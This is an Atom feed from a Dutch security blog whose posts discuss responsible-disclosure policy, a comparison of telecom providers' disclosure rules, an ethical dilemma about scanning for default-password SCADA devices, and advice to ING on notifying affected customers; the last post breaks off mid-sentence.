<?xml version="1.0" encoding="utf-8"?>


<feed xmlns="http://www.w3.org/2005/Atom">
  <title>floort.net</title>
  <link href="http://floort.net/blog/"></link>
  <updated>2013-05-31T11:36:20.973003+02:00</updated>
  <author>
    <name>Floor Terra</name>
  </author>
  <id>http://floort.net/blog/</id>
  <entry>
    <title>Re: Responsible disclosure richtlijn is onverantwoord risico</title>
    <link href="http://floort.net/blog/re-responsible-disclosure-richtlijn-is-onverantwoord-risico.html"></link>
    <id>http://floort.net/blog/re-responsible-disclosure-richtlijn-is-onverantwoord-risico.html</id>
    <updated>2013-01-04T00:43:27Z</updated>
    <summary>&lt;p&gt;Vandaag heeft het Minister Opstelten (Veiligheid en Justitie) een
leidraad gepubliceert over het verantwoord melden van
beveiligingslekken. Na een periode van veel media-aandacht voor
beveiligingslekken en arrestaties van hackers heerst er veel
onzekerheid. Hackers durven niet meer bedrijven te helpen en bedrijven
reageren vaak in paniek. Ik zou graag zien dat het onderlinge vertrouwen
weer hersteld wordt.&lt;/p&gt;

&lt;p&gt;Het initiatief van Opstelten is een goede stap vooruit. Door
als overheid aan te geven dat je de hulp van hackers goed kan gebruiken
en duidelijke richtlijnen te geven voor wat acceptabel is en wat niet
verwacht ik dat het vertrouwen tussen overheid en hackers versterkt kan
worden. Ik hoop ook dat het bedrijfsleven dit voorbeeld volgt.&lt;/p&gt;

&lt;p&gt;Brenno de Winter heeft vanwege dit gebrek aan vertrouwen erg vaak als
medium gefungeerd tussen hackers en bedrijven en overheden. Door de
bronbescherming die een journalist kan bieden blijven de hackers meestal
veilig en anoniem. Brenno heeft hiermee een ontzettend waardevolle
dienst verleend aan onze maatschappij. Het zou erg waardevol zijn als
beveiligingsproblemen ook aangekaart zouden kunnen worden zonder dat
daar een journalist aan te pas hoeft te komen. Daarvoor is echter
vertrouwen nodig.&lt;/p&gt;

&lt;p&gt;Volgens een recent &lt;a href=&#34;http://www.hpdetijd.nl/2013-01-03/responsible-disclosure-richtlijn-is-onverantwoord-risico/&#34;&gt;artikel&lt;/a&gt;
van Brenno heeft hij geen vertrouwen in dit initiatief. Ik ben veel
positiever dan Brenno.&lt;/p&gt;

&lt;p&gt;Brenno noemt het feit dat het OM zelfstandig kan besluiten
tot vervolging. Als onderbouwing linkt hij naar een &lt;a href=&#34;https://twitter.com/Byte_Fighter/status/286812448885981184&#34;&gt;tweet&lt;/a&gt;
van Lodewijk van Zwieten, d&amp;eacute; cybercrime Officier van Justitie.
Maar Lodewijk van Zwieten geeft ook aan dat Opstelten met het OM gaat
praten om hier duidelijke richtlijnen over op te stellen in een andere
&lt;a href=&#34;https://twitter.com/Byte_Fighter/status/286882655318982656&#34;&gt;tweet&lt;/a&gt;.
Om hier nu al kritiek op te hebben vind ik wel erg vroeg. Als ik zie hoe
de leidraad tot stand is gekomen met input van individuele hackers,
industrie en overheid heb ik er veel vertrouwen in dat ook bij de
gesprekken met het OM alle belangen zorgvuldig afgewogen worden.&lt;/p&gt;


&lt;p&gt;Een punt waar ik het eens ben met Brenno is dat soms instellingen een
externe motivatie nodig hebben om problemen op te lossen. De kans is
echter groot dat instellingen die inzien dat ze voordeel hebben bij een
responsible disclosure procedure ook inzien dat ze niet zomaar lekken
open kunnen laten staan. Maar wat als een instelling toch besluit om een
lek niet te repareren of gewoonweg geen reactie geeft op de melding?
Mijn ervaring is dat het heel effectief kan zijn om dan melding te doen
bij het NCSC. Een signaal van het NCSC komt heel anders over op een
instelling dan een signaal van een onbekende hacker.&lt;/p&gt;

&lt;p&gt;Ik zal de ontwikkelingen rond responsible disclosure aandachtig blijven
volgen en ik heb veel vertrouwen in de manier waarop het NCSC dit
aanpakt.&lt;/p&gt;


</summary>
  </entry>
  <entry>
    <title>Een goed gesprek</title>
    <link href="http://floort.net/blog/een-goed-gesprek.html"></link>
    <id>http://floort.net/blog/een-goed-gesprek.html</id>
    <updated>2012-11-19T13:37:42Z</updated>
    <summary>&lt;p&gt;Zoals verschenen op 
&lt;a href=&#34;https://www.alertonline.nl/column/floor-terra.aspx&#34;&gt;Alert
    Online&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Het is 4 uur en het rapport waar je zo lang aan hebt zitten werken is
bijna af. Je moet het alleen nog even langs je collega sturen zodat hij
nog een laatste keer alles kan doorlezen om de laatste foutjes er uit te
halen. Je maakt een nieuw mailtje aan, voegt het rapport als bijlage toe
en klikt op verzenden. Tijd voor een kopje koffie.&lt;/p&gt;

&lt;p&gt;Je pakt 2 kopjes koffie en loopt naar het kantoor van je collega om
alles samen door te nemen. Daar aangekomen blijkt hij niks te hebben
ontvangen. Terug bij je eigen computer blijkt waarom; bovenaan je inbox
staat een nieuw bericht: &#34;550 5.7.1 Message rejected due to unacceptable
attachments&#34;. De IT-afdeling heeft .zip-attachments geblokkeerd uit
veiligheidsoverwegingen, maar als je het rapport niet zipt kun je het
ook niet mailen omdat het dan te groot is. Je collega weet wel een
oplossing: een website waarmee je grote bestanden kan versturen. Hij
gebruikt het ook altijd voor de vakantiefoto&#39;s. Je maakt snel een
account aan, uploadt het rapport en stuurt de linkt naar je collega. Het
is nu al bijna vijf uur, dus je collega belooft er thuis even naar te
kijken zodat het direct de volgende ochtend verzonden kan worden. Een
paar dagen later lees je op Webwereld.nl dat je rapport is gelekt. De
schade valt mee; er stond weinig schokkende informatie in het rapport en
de meeste mensen zullen het na een week of twee weer vergeten zijn. Je
vraagt je af hoelang het zal duren voordat je collega&#39;s het vergeten
zijn en bedenkt je dat je geluk hebt gehad: de meeste rapporten waar je
aan werkt bevatten veel gevoeligere informatie.&lt;/p&gt;

&lt;p&gt;Achteraf is gebleken dat de website die je gebruikt hebt om het rapport
te versturen bedoeld is om publiekelijk bestanden te delen. Voor de
vakantiefoto&#39;s van je collega is dat niet erg en je had door je haast er
niet aan gedacht om je af te vragen wat die website precies zou doen met
je rapport. In dit fictieve voorbeeld hadden de problemen voorkomen
kunnen worden als bekend was dat er behoefte was aan het uitwisselen van
grotere bestanden. Er had had waarschijnlijk makkelijk een gedeelde
netwerkschijf opgezet kunnen worden of de beperkingen aan bijlages in
emails hadden versoepeld kunnen worden. Maar waarschijnlijk was deze
behoefte niet bekend.&lt;/p&gt;

&lt;p&gt;Mensen zijn goed in het vinden van beveiligingslekken. Niet alleen
hackers die bewust op zoek zijn, maar ook gewone werknemers die zonder
kwade bedoelingen kleine ergernissen proberen op te lossen om hun werk
beter te kunnen doen. In beide gevallen kan je als organisatie
technische maatregels nemen, maar als je echt wilt leren zal je de
dialoog moeten opzoeken. Organisaties kunnen veel leren door met hackers
te praten die lekken in hun systemen vinden. Maar ook binnen de
organisatie zelf valt er veel te leren door beter te luisteren naar de
mensen die de zelf oplossingen bedenken zoals in dit voorbeeld.&lt;/p&gt;

&lt;p&gt;Dus als je je straks nog steeds afvraagt hoe je kan bijdragen aan een
betere cybersecurity heb ik een heel simpel antwoord; de volgende keer
dat je koffie gaat drinken of gaat lunchen loop je even langs de
IT-afdeling. Ook als er iemand van buiten komt om problemen met
beveiliging te melden; nodig diegene uit voor een kop koffie en een goed
gesprek. Je kan zo nog een hoop van elkaar leren.&lt;/p&gt;
</summary>
  </entry>
  <entry>
    <title>Responsible disclosure beleid; een vergelijking</title>
    <link href="http://floort.net/blog/responsible-disclosure-beleid-een-vergelijking.html"></link>
    <id>http://floort.net/blog/responsible-disclosure-beleid-een-vergelijking.html</id>
    <updated>2012-10-29T00:00:00Z</updated>
    <summary>Op maandag 29 oktober komt ICT~Office met het &lt;a 
href=&#34;http://ictoffice.nl/index.shtml?id=12161&amp;amp;ch=ICT&#34;&gt;bericht&lt;/a&gt; dat telecomproviders in 
Nederland met een responsible disclosure beleid komen. Dat vind ik een erg goede ontwikkeling, 
maar dat is geen reden om niet kritisch te zijn. In deze blogpost vergelijk ik het responsible 
disclosure beleid van deze telecombedrijven en leg ik voor elk punt uit waarom dat belangrijk 
is.&lt;br /&gt;
&lt;br /&gt;
Deze pagina zal voorlopig regelmatig updates krijgen. Zowel inhoudelijk als voor het aanvullen 
van ontbrekende bedrijven.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&#34;&#34; name=&#34;more&#34;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;hr /&gt;
&lt;table&gt;
    &lt;thead&gt;
&lt;tr&gt;
            &lt;th&gt;&lt;/th&gt;
            &lt;th&gt;&lt;a href=&#34;http://www.kpn.com/Privacy.htm#tabcontent3&#34;&gt;KPN&lt;/a&gt;&lt;/th&gt;
            &lt;th&gt;&lt;a 
href=&#34;https://www.t-mobile.nl/Global/media/pdf/privacy_statement_juni_2012.pdf&#34;&gt;T-Mobile&lt;/a&gt;&lt;/th&gt;
            &lt;th&gt;&lt;a 
href=&#34;http://www.tele2.nl/klantenservice/veiligheid/tele2-en-veiligheid.html&#34;&gt;Tele2&lt;/a&gt;&lt;/th&gt;
            &lt;th&gt;&lt;a 
href=&#34;http://www.upc.nl/internet/veilig_internet/beveiligingsproblemen/&#34;&gt;UPC&lt;/a&gt;&lt;/th&gt;
            &lt;th&gt;&lt;a 
href=&#34;http://over.vodafone.nl/vodafone-nederland/privacy-veiligheid/beveiliging-en-bescherming/wat-doet-vodafone/meld-een-beveilig&#34;&gt;Vodafone&lt;/a&gt;&lt;/th&gt;
            &lt;th&gt;&lt;a 
href=&#34;https://www.ziggo.nl/#klantenservice/internet/internetveiligheid/meldpunt-internetbeveiliging/&#34;&gt;Ziggo&lt;/a&gt;&lt;/th&gt;
        &lt;/tr&gt;
&lt;/thead&gt;
    &lt;tbody&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Beschikbaar&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Begrijpelijk&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Terugkoppeling&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;~&lt;/td&gt;
            &lt;td&gt;~&lt;/td&gt;
            &lt;td&gt;~&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Gedragscode&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Beloning&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;~&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Credits&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Publicatie&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Veilig&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Anoniem&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
        &lt;/tr&gt;
&lt;tr&gt;
            &lt;td&gt;&lt;b&gt;Aansprakelijkheid&lt;/b&gt;&lt;/td&gt;
            &lt;td&gt;&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
            &lt;td&gt;X&lt;/td&gt;
        &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Legenda: X: OK, ~: Matig, blanco: niet aanwezig of slecht
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;Beschikbaar&lt;/h3&gt;
&lt;div&gt;
Het lijkt misshien flauw om deze te beoordelen, maar daar zijn twee redenen voor. Om te beginnen 
zijn niet alle responsible disclosure programma&#39;s al online beschikbaar. Zodra ze beschikbaar 
komen zal ik ze aanvinken en beoordelen op de andere criteria. Maar het zou ook kunnen dat een 
bedrijf wel een responsible disclosure procedure heeft, maar deze niet publiek toegankelijk geeft 
gemaakt. Als vinder van een lek moet het melden zo laagdrempelig mogelijk zijn en een verborgen 
uitleg van de procedure is een onnodig obstakel.&lt;br /&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Begrijpelijk&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
Hackers zijn geen juristen. De tekst moet kort en begrijpelijk zijn.&lt;br /&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Terugkoppeling&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
Het is erg demotiverend als je een lek meld en vervolgens geen reactie krijgt. Je weet niet of 
het bericht niet aangekomen is, of dat er besloten is om het lek niet te dichten. Daarom is het 
erg belangrijk om aan te geven binnen hoeveel tijd een melder een reactie zal krijgen en welke 
informatie teruggekoppeld zal worden (en welke niet).&lt;br /&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Gedragscode&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
Voor een bedrijf kan het eng zijn om je kwetsbaar op te stellen. Maar als je een responsible 
disclosure procedure hebt kan je dat ook juist gebruiken om duidelijke grenzen te stellen. Wat 
zie je als acceptabel gedrag, maar vooral ook wat niet? Je zou er bijvoorbeeld voor kunnen kiezen 
om bepaalde klassen kwetsbaarheden (zoals bijvoorbeeld een DDoS aanval) niet te accepteren bij 
als een verantwoorde melding.&lt;br /&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Beloning&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
Hackers die lekken melden verlenen een gratis, maar waardevolle dienst. Er is ook geen enkele 
verplichting om te melden volgens het proces zoals het bedrijf het aangegeven heeft. Om toch een 
motivatie te geven om net even de extra moeite te nemen kan het verstandig zijn om een beloning 
aan te bieden. Dat hoeft geen geldbedrag te zijn (mag wel!), maar ludieke kado&#39;s doen het ook 
goed. Denk bijvoorbeeld aan een tshirt met de tekst &#34;I hacked $bedrijfsnaam and all I got is this 
lousy tshirt!&#34;. Voor de interne organisatie geeft dit ook een duidelijk signaal dat meldingen erg 
gewaardeerd worden en het zal werknemers motiveren om meldingen goed op te pakken.&lt;br /&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Credits&lt;/h3&gt;
&lt;div&gt;
Naast een materiele beloning is publieke waardering erg waardevol voor veel hackers. Geef daarom 
in alle publicaties over de lek een eervolle vermelding voor de melder als diegene dat wilt. 
&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Publicatie&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
De kern van responsible disclosure is het verantwoordelijk publiceren van beveiligingslekken. De 
publicatie staat voorop zodat klanten gewaarschuwd worden en de maatschappij kan leren van de 
fouten.Het is daarom ook heel belangrijk om duidelijkheid te geven over de publicatie. Ga er 
vanuit dat de lek gepubliceerd zal worden en beperk je tot het aangeven van de kaders (zoals het 
afspreken van een zo kort mogelijk periode van geheimhouding om de lek te dichten.).&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Veilig&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
Als bedrijf zou ik niet willen dat informatie over kwetsbaarheden in mijn systemen onbeveiligd 
verstuurd zou worden. Het is dan ook aan te raden om in ieder geval een set pgp sleutels 
beschikbaar te hebben waarmee meldingen versleuteld verstuurd kunnen worden.&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;h3&gt;
Anoniem&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
Sommige mensen hechten erg veel waarde aan hun privacy. Geeft deze mensen de kans om anoniem 
lekken te kunnen melden.&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
Aansprakelijkheid&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
Het melden van een beveiligingslek kan risicovol zijn voor de melden. Soms kan er een wet zijn 
overtreden bij het ontdekken van een lek, vaak kan er onduidelijkheid over bestaan. Het is daarom 
voor de melders heel waardevol om een toezegging te hebben dat ze niet vervolgt zullen worden 
zolang ze zich netjes aan de voorwaarden houden.&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Hacker dilemma</title>
    <link href="http://floort.net/blog/hacker-dilemma.html"></link>
    <id>http://floort.net/blog/hacker-dilemma.html</id>
    <updated>2012-10-04T00:00:00Z</updated>
    <summary>Met enige regelmaat beland ik in een discussie waarin ik probeer uit te leggen dat er gevallen 
zijn waarin hacken wel illegaal is, maar niet meteen onethisch. Dat kunnen hele leuke 
filosofische discussies zijn, maar het kan heel verhelderend zijn om jezelf daadwerkelijk in zo&#39;n 
dilemma te plaatsen. Dat is dus precies wat ik gedaan heb. Ik heb bewust de naam van de 
leverancier weggelaten.&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Op Twitter lees ik de tweets van @ntisec met veel plezier. Een van de zaken 
die af en toe langskomen zijn slecht beveiligde SCADA-systemen. Wat mij opviel is dat 1 bepaald 
merk wel heel vaak langskomt. Ik heb voor veel van deze systemen nu al best vaak contact proberen 
op te nemen met het bedrijf dat de eigenaar is of het bedrijf dat 
ze&amp;nbsp;ge&amp;iuml;nstalleerd&amp;nbsp;heeft. Opvallend vaak hebben deze machines nog het wachtwoord staan op 
de fabrieksinstelling. Dit wachtwoord is voor alle&amp;nbsp;apparaten&amp;nbsp;van deze fabrikant 
hetzelfde en is te vinden in de handleidingen die online te vinden zijn.&lt;br /&gt;
&lt;br /&gt;
Erg vaak krijg ik geen reactie van degene met wie ik contact opneem. Dat betekent dat het mij 
relatief veel tijd kost om de eigenaar te achterhalen en het probleem uit te leggen, maar dat dit 
bijna geen effect heeft. Op een gegeven moment werden het er zoveel dat ik besloot dat ik het 
anders moest aanpakken. Ik doe het eerste wat er in mij opkomt als ik een vervelend probleem 
tegenkom: ik schrijf een programma om het voor me op te lossen.&lt;br /&gt;
&lt;br /&gt;
Wat ik gedaan heb is een programma geschreven dat snel het hele Nederlandse internet (dat is 
voorlopig genoeg) kan scannen en mij een lijst met alle adressen teruggeeft die een systeem van 
de betreffende fabrikant hebben aangesloten op het internet en bij welke daarvan je nog met het 
standaard wachtwoord in kan loggen. Dan heb ik een mooi rapport om te laten zien hoe groot het 
probleem is en kan ik misschien met een beetje publiciteit of via het NCSC het hele probleem in 1 
keer oplossen.&lt;br /&gt;
&lt;br /&gt;
De scanner is geschreven, nu is het dus gewoon een kwestie van de scan uitvoeren, het rapportje 
uitdraaien en het probleem is opgelost toch? Helaas niet, het daadwerkelijk uitvoeren van de scan 
is strafbaar. Om nauwkeuriger te zijn: door het uitvoeren van de test of het standaard wachtwoord 
bruikbaar is zou ik computervredebreuk plegen. In totaal zou ik dus miljoenen keren 
computervredebreuk plegen.&lt;br /&gt;
&lt;br /&gt;
Ik help graag met het oplossen van problemen, zelfs als ik er zelf niet meteen wat aan heb. Het 
plegen van een veelvoud van strafbare feiten voor iets waar ik zelf niets aan heb is echter niet 
iets wat ik zomaar zal doen.&lt;br /&gt;
&lt;br /&gt;
Aan de ene kant kan ik dus met weinig moeite zorgvuldig een flink aantal bedrijven veiliger maken 
met een laag risico dat ik zelf schade aanricht. Aan de andere kant heb ik niet zo&#39;n zin in 
problemen met justitie. Het makkelijkst zou zijn om helemaal niks te doen; de veiligheid van die 
systemen is niet mijn verantwoordelijkheid en de wet overtreden is ook niet goed. Dit is ook het 
advies dat ik van de meeste mensen krijg. Dat vind ik echter te makkelijk; als ik mensen kan 
helpen vind ik het niet ethisch om daar mijn handen van af te trekken.&lt;br /&gt;
&lt;br /&gt;
Wat zouden jullie doen?&lt;br /&gt;
&lt;br /&gt;
Update: Behalve dat ze een streng en behulpzaam rode taalkundige pen hanteert maakt ze ook 
kick-ass tekeningen.&amp;nbsp;&lt;a href=&#34;http://www.neetje.nl/&#34;&gt;http://www.neetje.nl/&lt;/a&gt;&lt;br /&gt;
</summary>
  </entry>
  <entry>
    <title>Ongevraagd advies aan de ING</title>
    <link href="http://floort.net/blog/ongevraagd-advies-aan-de-ing.html"></link>
    <id>http://floort.net/blog/ongevraagd-advies-aan-de-ing.html</id>
    <updated>2012-06-14T00:00:00Z</updated>
    <summary>Op 13 juni 2012 komt Webwereld met een &lt;a 
href=&#34;http://webwereld.nl/nieuws/110835/hacker-steelt-bankgegevens-miljoen-ing-klanten---update.html&#34;&gt;bericht&lt;/a&gt;&amp;nbsp;dat 
een hacker een bankgegevens van een miljoen klanten van de ING gestolen zou hebben. Dit blijkt 
een grote fout geweest te zijn van het ANP waar ik de oorzaak nog niet van weet. Dat is heel 
lullig voor de ING en de ING komt snel met een &lt;a 
href=&#34;http://www.ing.nl/nieuws/nieuws_en_persberichten/2012/06/reactie_ing_nav_onjuiste_berichtgeving_over_hacking.aspx&#34;&gt;persbericht&lt;/a&gt;&amp;nbsp;om 
dit recht te zetten. Toch denk ik dat de ING veel fout heeft gedaan.&lt;br /&gt;
&lt;div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class=&#34;separator&#34; style=&#34;clear: both; text-align: center;&#34;&gt;
&lt;a 
href=&#34;http://4.bp.blogspot.com/-eJBJA3GJlE4/T9kW1QVXTWI/AAAAAAAACCM/zTiWrmjHduM/s1600/ING_persbericht.png&#34; 
imageanchor=&#34;1&#34; style=&#34;margin-left: 1em; margin-right: 1em;&#34;&gt;&lt;img border=&#34;0&#34; height=&#34;190&#34; 
src=&#34;http://4.bp.blogspot.com/-eJBJA3GJlE4/T9kW1QVXTWI/AAAAAAAACCM/zTiWrmjHduM/s320/ING_persbericht.png&#34; 
width=&#34;320&#34; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
De situatie, voor zover die publiekelijk bekend is, is als volgt: Iemand waarvan bekend is dat 
hij in het verleden veelvuldig fraude heeft&amp;nbsp;gepleegd&amp;nbsp;heeft klantgegevens van de ING 
verzameld.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Met alleen deze informatie is het voor mij heel duidelijk wat de ING als eerste hoort te doen: De 
getroffen mensen op de hoogte stellen.&lt;/div&gt;
&lt;div&gt;
Als ik verantwoordelijk zou zijn voor de voorlichting bij de ING zou ik als eerste een email naar 
de 1280 getroffen klanten sturen.&lt;/div&gt;
&lt;blockquote&gt;
&lt;br /&gt;
Geachte klant van de ING,&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote&gt;
Op 13 juni berichtten de media dat een hacker 1 miljoen klantgegevens van de ING heeft gestolen. 
Dit is onjuist. De systemen van ING zijn niet gehackt. Iemand heeft van 1280 klanten van de ING 
het rekeningnummer en naam achterhaald. Deze gegevens zijn niet direct te misbruiken. U bent een 
van de getroffen klanten en wij willen u zo goed mogelijk informeren over wat er met uw gegevens 
is gebeurd.&lt;/blockquote&gt;
&lt;blockquote&gt;
De&amp;nbsp;&amp;nbsp;persoon die die deze informatie heeft achterhaald zit momenteel vast op verdenking 
van fraude. Er is geen aanwijzing gevonden dat gegevens van de ING misbruikt zijn, maar we werken 
samen met justitie om alle eventuele misbruik op te sporen.&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote&gt;
Omdat het aannemelijk is dat de gegevens verzameld zijn met als doel fraude te plegen vragen wij 
u de komende tijd extra oplettend te zijn. Als u iets verdachts opmerkt in uw bankafschriften, 
phishing mails of op een andere plek vragen wij u direct contact op te nemen met de ING zodat wij 
direct actie kunnen ondernemen om misbruik van uw gegevens op te sporen en tegen te 
houden.&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote&gt;
Zodra meer bekend is over deze zaak zullen we u direct op de hoogte stellen.&lt;/blockquote&gt;
&lt;blockquote&gt;
Onze excuses voor de overlast.&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote&gt;
ING Nederland&amp;nbsp;&lt;/blockquote&gt;
Pas daarna zou ik een persbericht uitsturen om uit te leggen dat de berichtgeving in de media 
onjuist is. De vermelding dat klanten geen risico lopen vind ik kwalijk. Hoe meer accurate 
gegevens over klanten bekend zijn hoe effectiever phishing campagnes zullen zijn. De gegevens 
zijn overduidelijk verzameld door iemand met als doel om er misbruik mee te plegen de mededeling 
dat ze niet misbruikt kunnen worden is wat mij betreft volkomen ongeloofwaardig.&lt;br /&gt;
&lt;br /&gt;
Laat zien dat jullie meer kunnen dan alleen reageren op foutieve berichtgeving en laat zien dat 
jullie echt geloven dat jullie alle zaken op orde hebben door jezelf een beetje kwetsbaar op te 
stellen en voor de klanten op te komen. Ik weet zeker dat ik zo&#39;n opstelling heel erg zou 
waarderen!&lt;br /&gt;
&lt;br /&gt;
Update: De ING zegt geen gegevens verstrekt te hebben aan de &#34;hacker&#34;. Maar wat de ING doet 
voldoet aan de definitie van &#34;verstrekken van persoonsgegevens&#34; (Wbp art. 1). En volgens art. 
35.2 hebben degenen van wie gegevens zijn verstrekt het recht om te weten dat hun gegevens 
verstrekt zijn aan deze persoon.
</summary>
  </entry>
  <entry>
    <title>Drie keer kloppen?</title>
    <link href="http://floort.net/blog/drie-keer-kloppen.html"></link>
    <id>http://floort.net/blog/drie-keer-kloppen.html</id>
    <updated>2012-03-21T00:00:00Z</updated>
    <summary>Wie kent het nog: De &#34;Drie keer kloppen&#34;-campagne van Nederlandse Vereniging van Banken (NVB) om 
klanten bewust te maken van beveiliging bij internetbankieren? In tv-spotjes, websites en 
tijdschriften werden mensen bewust gemaakt van het feit dat ze zelf deels verantwoordelijk zijn 
voor de veiligheid van hun online bankverkeer. Daarbij werden drie punten gegeven die je als 
gebruiker moest controleren of ze wel kloppen. Als eerste moet je de&amp;nbsp;beveiliging&amp;nbsp;van je 
computer nalopen: heb je alle updates&amp;nbsp;ge&amp;iuml;nstalleerd, heb je antivirus, etc.? Als tweede moet 
de website kloppen. Wat hiermee bedoeld werd was dat je moest kijken of je op de juiste website 
zit (kijk naar de url) en of je het slotje in je url balk ziet (als je HTTPS gebruikt). Dit is om 
phishing en man in the middle (mitm) aanvallen tegen te gaan. Als derde moet je regelmatig 
je&amp;nbsp;rekeningafschriften&amp;nbsp;controleren zodat je, als het dan toch misgaat, zo snel mogelijk 
fraude opmerkt en maatregels kan nemen.&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Natuurlijk zijn deze drie punten niet genoeg om alle vormen van fraude tegen 
te gaan, maar de campagne was effectief. Mensen zijn bewuster geworden van de risico&#39;s en ik 
twijfel er niet aan dat het criminelen een stuk moeilijker gemaakt is om fraude te plegen. We 
zijn nu een paar jaar verder en bijna iedereen gebruikt nu het internet voor bankzaken. Maar er 
